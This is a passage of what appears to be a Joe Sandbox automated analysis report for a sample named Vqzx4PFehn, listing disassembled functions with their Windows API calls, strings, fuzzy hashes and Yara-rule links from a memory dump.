Instruction Fuzzy Hash: F7315C316003269FFB62AA3DDA44B9A77E9AF10210F2088AAE5C8D7161DF31E844DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0101D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

GetWindow.USER32(?,00000005), ref: 0101D6C1
GetClassNameW.USER32(00000000,?,00000800), ref: 0101D6ED

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

GetWindowLongW.USER32(00000000,000000F0), ref: 0101D709
SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0101D720
GetObjectW.GDI32(00000000,00000018,?), ref: 0101D734
SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0101D75D
DeleteObject.GDI32(00000000), ref: 0101D764
GetWindow.USER32(00000000,00000002), ref: 0101D76D

Strings

STATIC, xrefs: 0101D6F3

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
String ID: STATIC
API String ID: 3820355801-1882779555
Opcode ID: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
Instruction ID: 25dfd916c8ba7c0ab13d058deccb356f20d20d70cb3819897a4b6106aaf2844e
Opcode Fuzzy Hash: 7b211ac1ec016f48996b362fb73a61cf88782a7a2351b924daa4c47dd72f0b4b
Instruction Fuzzy Hash: B8112432601791BBF2316AB49C4DFAF7AACBF54711F004510FAC5AA09DEB6DCA0947E4

Uniqueness

Uniqueness Score: -1.00%

Function 010296F1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 01029705

Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?), ref: 01028DE2
Part of subcall function 01028DCC: GetLastError.KERNEL32(?,?,0102C896,?,00000000,?,00000000,?,0102C8BD,?,00000007,?,?,0102CCBA,?,?), ref: 01028DF4

_free.LIBCMT ref: 01029711
_free.LIBCMT ref: 0102971C
_free.LIBCMT ref: 01029727
_free.LIBCMT ref: 01029732
_free.LIBCMT ref: 0102973D
_free.LIBCMT ref: 01029748
_free.LIBCMT ref: 01029753
_free.LIBCMT ref: 0102975E
_free.LIBCMT ref: 0102976C

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
Instruction ID: a807f113391efa2cf6189ab72bf95ccdf6b102d967594a14376634fc56722bdd
Opcode Fuzzy Hash: c43e232320fa49392d8cc6717b0b964e5f0fa1288f34522141f2b73dbaf3b9d3
Instruction Fuzzy Hash: 5111B67A51012ABFDB01FF54C840CDD3BB5EF24250B5199A2FA488F231DA32DA54DB84

Uniqueness

Uniqueness Score: -1.00%

Function 01022E31 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 01022F50
___TypeMatch.LIBVCRUNTIME ref: 0102305E
_UnwindNestedFrames.LIBCMT ref: 010231B0
CallUnexpected.LIBVCRUNTIME ref: 010231CB
_abort.LIBCMT ref: 010231D0

Strings

csm, xrefs: 01022EDB
csm, xrefs: 01022F87
csm, xrefs: 01022E6E

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
String ID: csm$csm$csm
API String ID: 322700389-393685449
Opcode ID: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
Instruction ID: 3009a68ba0c10372f4f5e81e888928a06bdf6dfffadf82987a72d16c11bf00eb
Opcode Fuzzy Hash: 37ff6d6e9d14b98615f68c4780c8c35fd2040b24c6d3f7f7802e83d4d219e026
Instruction Fuzzy Hash: 12B19F3180022ADFCF65DFA8C8809AEBBB5FF18310F1441A9E9816F216D739DA51CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01006FA5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 134COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01006FAA
_wcslen.LIBCMT ref: 01007013
_wcslen.LIBCMT ref: 01007084

Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
Part of subcall function 01007A9C: GetLastError.KERNEL32 ref: 01007AF1
Part of subcall function 01007A9C: CloseHandle.KERNEL32(?), ref: 01007B00

Strings

UNC\, xrefs: 01007051
SeRestorePrivilege, xrefs: 01006FC2
\??\, xrefs: 0100702B
SeCreateSymbolicLinkPrivilege, xrefs: 01006FCC

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen$CloseCurrentErrorH_prologHandleLastProcess
String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
API String ID: 3122303884-3508440684
Opcode ID: d9b94b5d37e00c932afdf3f049a2687002eee7f0da5344e5cfc58e3680cd9a8f
Instruction ID: ca10db17fc503464c14c077f19f12ba8a28207a9924c6d18ed898d4d9aa9e784
Opcode Fuzzy Hash: d9b94b5d37e00c932afdf3f049a2687002eee7f0da5344e5cfc58e3680cd9a8f
Instruction Fuzzy Hash: 7B41C0B1E04745AAFB22E7789C81FEE77ACAF54300F004495FAC5A71C1D679B6888660

Uniqueness

Uniqueness Score: -1.00%

Function 01019711 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01019736
_wcslen.LIBCMT ref: 010197D6
GlobalAlloc.KERNEL32(00000040,?), ref: 010197E5
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 01019806

Strings

<html>, xrefs: 01019755, 0101978E
</html>, xrefs: 010197B7
<head><meta http-equiv="content-type" content="text/html; charset=, xrefs: 01019760
utf-8"></head>, xrefs: 0101976B

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen$AllocByteCharGlobalMultiWide
String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
API String ID: 1116704506-4209811716
Opcode ID: f2934913839258f26950f6bf7436b773b3484515b71150082b1941a3b2bdfd9f
Instruction ID: 1e808a2ef87b8351e980c866ebd2a9022a9b0e351365c36056730496eca19ff7
Opcode Fuzzy Hash: f2934913839258f26950f6bf7436b773b3484515b71150082b1941a3b2bdfd9f
Instruction Fuzzy Hash: 4B316A32504312BAE725AF349C45FAF7B9CEFA5314F14011DF9C19A1C5EB6CD90983A6

Uniqueness

Uniqueness Score: -1.00%

Function 0101B5C0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370

EndDialog.USER32(?,00000001), ref: 0101B610
SendMessageW.USER32(?,00000080,00000001,?), ref: 0101B637
SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 0101B650
SetWindowTextW.USER32(?,?), ref: 0101B661
GetDlgItem.USER32(?,00000065), ref: 0101B66A
SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 0101B67E
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 0101B694

Strings

LICENSEDLG, xrefs: 0101B5D4

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: MessageSend$Item$TextWindow$Dialog
String ID: LICENSEDLG
API String ID: 3214253823-2177901306
Opcode ID: 60c614c8ac3bb95f76efa5efb928ce110d713a522cd3d3ec6ba67015aee651e0
Instruction ID: 34be27a9a6e3a3ee10a83ec1f57ab02219d233977af3c547384fd8adb991aca8
Opcode Fuzzy Hash: 60c614c8ac3bb95f76efa5efb928ce110d713a522cd3d3ec6ba67015aee651e0
Instruction Fuzzy Hash: 7521B431604205BBE3316A69ED49F7B3FBCFB5AB45F010414FAC499098CB6FA8019771

Uniqueness

Uniqueness Score: -1.00%

Function 0101FD10 Relevance: 13.7, APIs: 9, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,F8761C53,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FD99
MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE14
SysAllocString.OLEAUT32(00000000), ref: 0101FE1F
_com_issue_error.COMSUPP ref: 0101FE48
_com_issue_error.COMSUPP ref: 0101FE52
GetLastError.KERNEL32(80070057,F8761C53,00000001,00000000,00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE57
_com_issue_error.COMSUPP ref: 0101FE6A
GetLastError.KERNEL32(00000000,?,?,0100AF6C,ROOT\CIMV2), ref: 0101FE80
_com_issue_error.COMSUPP ref: 0101FE93

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
String ID:
API String ID: 1353541977-0
Opcode ID: 30a98c7b787c03f0a7f11add889d2f5c8f845282492e5547259e452dd2875f3f
Instruction ID: bf140e08184431db7b974a15e5e8e20b8ca89c14d803a2490dde74f185a75901
Opcode Fuzzy Hash: 30a98c7b787c03f0a7f11add889d2f5c8f845282492e5547259e452dd2875f3f
Instruction Fuzzy Hash: 3A411B71A00217ABDB10DF68C844BEFBBE9FB48B10F104269F995EB284D73D9504C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0100AF24 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 210COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0100AF29

Strings

ROOT\CIMV2, xrefs: 0100AF5C
Windows 10, xrefs: 0100B0C2
WQL, xrefs: 0100AFDC
SELECT * FROM Win32_OperatingSystem, xrefs: 0100AFCA
Name, xrefs: 0100B0B0

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: H_prolog
String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
API String ID: 3519838083-3505469590
Opcode ID: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
Instruction ID: 7207fa42f4e8cad32a68352760d62e6085b9f82051d3e727763a4dab0f4027f9
Opcode Fuzzy Hash: 2147d638cd8158ff0c209cae10e17e6839a91c1f03de55c6ec7906e5e6d3b79b
Instruction Fuzzy Hash: 5F717F74B00219EFEB25DFA5C8959AEBBB9FF88710F04015DE596AB290CB356D01CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01009382 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 01009387
GetLongPathNameW.KERNEL32(?,?,00000800), ref: 010093AA
GetShortPathNameW.KERNEL32(?,?,00000800), ref: 010093C9

Part of subcall function 0100C29A: _wcslen.LIBCMT ref: 0100C2A2

Part of subcall function 01011FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0100C116,00000000,.exe,?,?,00000800,?,?,?,01018E3C), ref: 01011FD1

_swprintf.LIBCMT ref: 01009465

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

MoveFileW.KERNEL32(?,?), ref: 010094D4
MoveFileW.KERNEL32(?,?), ref: 01009514

Strings

rtmp%d, xrefs: 0100944E

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf_wcslen
String ID: rtmp%d
API String ID: 3726343395-3303766350
Opcode ID: 1bab77ed9097dc1ffba8f286c627187c2be2aa83de3e1a88ad53a7df2de5d4c0
Instruction ID: 6c871d4ed023099e9c59116efca6dfc5708b24ac7b699d2667ab094f29e3e869
Opcode Fuzzy Hash: 1bab77ed9097dc1ffba8f286c627187c2be2aa83de3e1a88ad53a7df2de5d4c0
Instruction Fuzzy Hash: BE41B471900259A6FF22EB61CC44EDE737CAF54349F0048E5A6CDE3082DB398BC88B60

Uniqueness

Uniqueness Score: -1.00%

Function 01011218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0101122E

Part of subcall function 0100B146: GetVersionExW.KERNEL32(?), ref: 0100B16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 01011251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 01011263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 01011274
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011284
SystemTimeToFileTime.KERNEL32(?,?), ref: 01011294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 010112CF
__aullrem.LIBCMT ref: 01011379

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
Instruction ID: c58816a347762b16a986687b2ae2cdc61769bce80be2144e975bca92625e5424
Opcode Fuzzy Hash: fb1a626bf786737577eb16819ca2564bb2fed4b38167c4f18d606bcfc70ea8af
Instruction Fuzzy Hash: CC4107B1508306AFC754DF65C8849ABBBF9FF88214F00892EF6D6C6204E739E559CB52

Uniqueness

Uniqueness Score: -1.00%

Function 01002210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 01002536

Part of subcall function 01004092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 010040A5

Part of subcall function 010105DA: _wcslen.LIBCMT ref: 010105E0

Strings

x%u, xrefs: 010026FD
xc%u, xrefs: 0100275A
;%u, xrefs: 01002523

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: ae61fa247bd1470eb7e722da3a495f8e9a6d8a2423fad5082dd8cc59e6ee5b90
Instruction ID: b00bfddbf71078920fbd15b6587dc51bc22943a1d932c61db0b363edee86153a
Opcode Fuzzy Hash: ae61fa247bd1470eb7e722da3a495f8e9a6d8a2423fad5082dd8cc59e6ee5b90
Instruction Fuzzy Hash: 35F119706043429BFB17EB28C598BFE7BDA5F94300F0845BDEEC69B2C2CB6495458762

Uniqueness

Uniqueness Score: -1.00%

Function 01019CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 01019D0A

Strings

>, xrefs: 01019D4B
<style>, xrefs: 01019E30
<br>, xrefs: 01019DFE
</p>, xrefs: 01019DE8
</style>, xrefs: 01019E52

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
Instruction ID: 01e22e2e6d2abbea84964a27813895f95d7ba3ef1aa2a810036fd3d266d65a0b
Opcode Fuzzy Hash: 02cddaca2c61554bfc2140857eb0537ec81df76d8ebba31a667aa26f9be591c7
Instruction Fuzzy Hash: 50515A2670032391EB746A6DD8317B673E4DFA0758F99045EEAC18B1C8FB6D88818261

Uniqueness

Uniqueness Score: -1.00%

Function 0102F68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0102FE02,00000000,00000000,00000000,00000000,00000000,0102529F), ref: 0102F6CF
__fassign.LIBCMT ref: 0102F74A
__fassign.LIBCMT ref: 0102F765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0102F78B
WriteFile.KERNEL32(?,00000000,00000000,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7AA
WriteFile.KERNEL32(?,00000000,00000001,0102FE02,00000000,?,?,?,?,?,?,?,?,?,0102FE02,00000000), ref: 0102F7E3

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: 623ac6363aa634b8ba0a28e7adf14a4ff18ec032fc8eee0677c421ffedb81f9e
Instruction ID: 65a1d511bb19669f7df425ab9cb1dcddc75edcf7d8d28d17e0bd504c170005a6
Opcode Fuzzy Hash: 623ac6363aa634b8ba0a28e7adf14a4ff18ec032fc8eee0677c421ffedb81f9e
Instruction Fuzzy Hash: EF51B6B1D0025A9FDB10CFA8D885AEEFBF8FF09310F14415AE995E7251E771A940CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 01022900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 01022937
___except_validate_context_record.LIBVCRUNTIME ref: 0102293F
_ValidateLocalCookies.LIBCMT ref: 010229C8
__IsNonwritableInCurrentImage.LIBCMT ref: 010229F3
_ValidateLocalCookies.LIBCMT ref: 01022A48

Strings

csm, xrefs: 010229DD

Memory Dump Source

Source File: 00000000.00000002.1626669415.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.1626651028.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626699678.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626718398.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1626772752.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_Vqzx4PFehn.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ea25dc43dd936b3596512606c963e89c2044da082871dfc210703a22dc3b3772
Instruction ID: f3f7b3ca64b21dfbc705c6b47e95f3eb92a020606cac315b7f150a5e2c7df5da
Opcode Fuzzy Hash: ea25dc43dd936b3596512606c963e89c2044da082871dfc210703a22dc3b3772
Instruction Fuzzy Hash: 1941A230A00229AFCF10DFACC880A9EBFF5BF45364F1481A5E895AB392D775D955CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01019ED5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 01019EEE
GetWindowRect.USER32(?,00000000), ref: 01019F44
